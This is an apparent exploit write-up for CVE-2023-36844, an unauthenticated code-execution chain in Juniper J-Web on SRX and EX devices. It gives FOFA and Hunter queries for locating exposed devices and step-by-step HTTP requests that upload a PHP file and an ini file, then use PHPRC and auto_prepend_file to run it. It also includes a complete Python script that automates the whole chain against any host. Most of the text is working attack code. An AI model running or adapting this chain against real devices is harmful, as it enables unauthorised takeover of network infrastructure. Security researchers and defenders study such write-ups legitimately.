0x01 Disclaimer
Do not use any of the technical information or code tools provided in this article for unauthorised testing or other illegal activity. Any direct or indirect consequence or loss caused to any computer system by a user applying the technical information or code tools in this article is the sole responsibility of that user. The technical information and code tools are provided for learning purposes only, and any adverse outcome is unrelated to the author. Users must comply with applicable laws and regulations and respect the legitimate rights of others.
0x02 Affected Versions
Juniper Junos OS on SRX and EX series devices (J-Web)
0x03 Network Mapping
fofa:
title:"Juniper Web Device Manager"
hunter:
web.title:"Juniper Web Device Manager"
0x04 Vulnerability Reproduction
Step 1
1. First prepare a payload and compute its length (the length of the raw payload is used as csize).
<?php phpinfo();?>
length: 18
2. Base64-encode the payload and place it in the request body, with csize set to the raw length.
rs=do_upload&rsargs[0]=[{"fileData":"data:text/html;base64,PD9waHAgcGhwaW5mbygpOz8+","fileName":"test.php","csize":18}]
3. URL-encode the request body.
rs=do_upload&rsargs%5B0%5D=%5B%7B%22fileData%22%3A%22data%3Atext%2Fhtml%3Bbase64%2CPD9waHAgcGhwaW5mbygpOz8%2B%22%2C%22fileName%22%3A%22test.php%22%2C%22csize%22%3A18%7D%5D
4. Send the request. The value of converted_fileName in the response body (a name ending in .php) must be extracted, because the second POST request needs it. The file is written under /var/tmp rather than somewhere the web server serves directly, so it cannot simply be requested by URL; the next two steps make PHP load it anyway.
POST /webauth_operation.php HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
rs=do_upload&rsargs%5B0%5D=%5B%7B%22fileData%22%3A%22data%3Atext%2Fhtml%3Bbase64%2CPD9waHAgcGhwaW5mbygpOz8%2B%22%2C%22fileName%22%3A%22test.php%22%2C%22csize%22%3A18%7D%5D
Step 2
1. Copy the converted_fileName value (*.php) from the Step 1 response, build the ini payload from it, and base64-encode it.
auto_prepend_file="/var/tmp/642bc02799e8e74b368bb685531d80ea63b71554425961cc0b201917a5d25e78.php"
YXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzY0MmJjMDI3OTllOGU3NGIzNjhiYjY4NTUzMWQ4MGVhNjNiNzE1NTQ0MjU5NjFjYzBiMjAxOTE3YTVkMjVlNzgucGhwIg==
2. Place the base64 string in the request body, with csize set to the raw length (97).
rs=do_upload&rsargs[0]=[{"fileData":"data:plain/text;base64,YXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzY0MmJjMDI3OTllOGU3NGIzNjhiYjY4NTUzMWQ4MGVhNjNiNzE1NTQ0MjU5NjFjYzBiMjAxOTE3YTVkMjVlNzgucGhwIg==","fileName":"test.ini","csize":97}]
3. URL-encode it in the same way.
rs=do_upload&rsargs%5B0%5D=%5B%7B%22fileData%22%3A%22data%3Aplain%2Ftext%3Bbase64%2CYXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzY0MmJjMDI3OTllOGU3NGIzNjhiYjY4NTUzMWQ4MGVhNjNiNzE1NTQ0MjU5NjFjYzBiMjAxOTE3YTVkMjVlNzgucGhwIg%3D%3D%22%2C%22fileName%22%3A%22test.ini%22%2C%22csize%22%3A97%7D%5D
4. Send the request. The value of converted_fileName in the response body (a name ending in .ini) must be extracted, because Step 3 needs it.
POST /webauth_operation.php HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 282
rs=do_upload&rsargs%5B0%5D=%5B%7B%22fileData%22%3A%22data%3Aplain%2Ftext%3Bbase64%2CYXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzY0MmJjMDI3OTllOGU3NGIzNjhiYjY4NTUzMWQ4MGVhNjNiNzE1NTQ0MjU5NjFjYzBiMjAxOTE3YTVkMjVlNzgucGhwIg%3D%3D%22%2C%22fileName%22%3A%22test.ini%22%2C%22csize%22%3A97%7D%5D
Step 3
1. Take the converted_fileName value (*.ini) from the Step 2 response and append it to the PHPRC parameter:
/webauth_operation.php?PHPRC=/var/tmp/03576ce5b74d4a2bd883e266baff2734fe7bd81e5b455440e01b0a4e9585344b.ini
Requesting this URL makes PHP read the uploaded .ini as its configuration file. Its auto_prepend_file directive then prepends the uploaded .php file to the executing script, so the phpinfo() payload runs without any authentication and its output appears in the response.
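The following script is an added example, not the author's tool or any Juniper code: it builds the three request bodies exactly as the steps above show them (so the hand-computed csize values and Content-Length headers can be checked), extracts converted_fileName from a response, and assembles the final PHPRC URL. The MIME labels text/html and plain/text are copied from the article's requests. The article never shows a raw response, so the converted_fileName pattern and the run_chain helper's response handling are assumptions.

```python
#!/usr/bin/env python3
"""Added example: request builder for the three-stage J-Web upload chain above.

Reproduces the article's request bodies byte for byte, so lengths and
encodings can be verified instead of counted by hand.
"""
import base64
import http.client
import json
import re
import ssl
from typing import Optional
from urllib.parse import urlencode

TARGET_PATH = "/webauth_operation.php"
UPLOAD_DIR = "/var/tmp"  # directory where the article's converted files land

# Assumption: the article never shows the raw response, so this pattern just
# tolerates JSON-style and key=value spellings of converted_fileName.
_CONVERTED = re.compile(r"converted_fileName[\"']?\s*[:=]\s*[\"']?([A-Za-z0-9_.-]+)")


def build_upload_body(payload: bytes, file_name: str, mime: str) -> str:
    """Return the URL-encoded form body for one do_upload call.

    csize is the length of the raw payload, not of its base64 form; that is
    the 18 and 97 the article counts by hand.  urlencode percent-encodes
    '[', ']', '/', ':', ',', '"', '+' and '=' exactly as the article does.
    """
    b64 = base64.b64encode(payload).decode("ascii")
    entry = {
        "fileData": f"data:{mime};base64,{b64}",
        "fileName": file_name,
        "csize": len(payload),
    }
    rsargs = json.dumps([entry], separators=(",", ":"))
    return urlencode({"rs": "do_upload", "rsargs[0]": rsargs})


def stage1_body(php_source: bytes = b"<?php phpinfo();?>") -> str:
    """Step 1: upload the PHP file (MIME label copied from the article)."""
    return build_upload_body(php_source, "test.php", "text/html")


def stage2_body(converted_php: str) -> str:
    """Step 2: upload an ini that prepends the renamed PHP file to every script."""
    ini = f'auto_prepend_file="{UPLOAD_DIR}/{converted_php}"'.encode("ascii")
    return build_upload_body(ini, "test.ini", "plain/text")


def stage3_url(converted_ini: str) -> str:
    """Step 3: make PHP read the uploaded ini through PHPRC."""
    return f"{TARGET_PATH}?PHPRC={UPLOAD_DIR}/{converted_ini}"


def content_length(body: str) -> int:
    """Content-Length header value for a form body."""
    return len(body.encode("ascii"))


def extract_converted_name(response_body: str) -> Optional[str]:
    """Pull converted_fileName out of a do_upload response, or None if absent."""
    m = _CONVERTED.search(response_body)
    return m.group(1) if m else None


def run_chain(host: str, port: int = 443) -> str:
    """Drive the three steps against one host and return the final PHPRC URL.

    Not exercised offline.  J-Web normally presents a self-signed certificate,
    so verification is disabled.  Only use against systems you are authorised to test.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, timeout=15, context=ctx)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}

    def post(body: str) -> str:
        conn.request("POST", TARGET_PATH, body=body, headers=headers)
        return conn.getresponse().read().decode("utf-8", "replace")

    php_name = extract_converted_name(post(stage1_body()))
    if not php_name:
        raise RuntimeError("step 1: no converted_fileName in response")
    ini_name = extract_converted_name(post(stage2_body(php_name)))
    if not ini_name:
        raise RuntimeError("step 2: no converted_fileName in response")
    url = stage3_url(ini_name)
    conn.request("GET", url, headers={"Connection": "close"})
    page = conn.getresponse().read().decode("utf-8", "replace")
    # phpinfo() output always carries the string "PHP Version"
    print("phpinfo() executed" if "PHP Version" in page else "no phpinfo() output seen")
    return url


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <host>")
    print(run_chain(sys.argv[1]))
```

With the article's own values, stage1_body() reproduces the 171-byte body of the first request and stage2_body("642bc...e78.php") the 282-byte body of the second, which is a quick way to confirm that csize refers to the decoded payload length and that the base64 padding must be sent as %3D%3D.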
0x05 Download
Reply with the keyword CVE-2023-36844 on the official account to obtain it.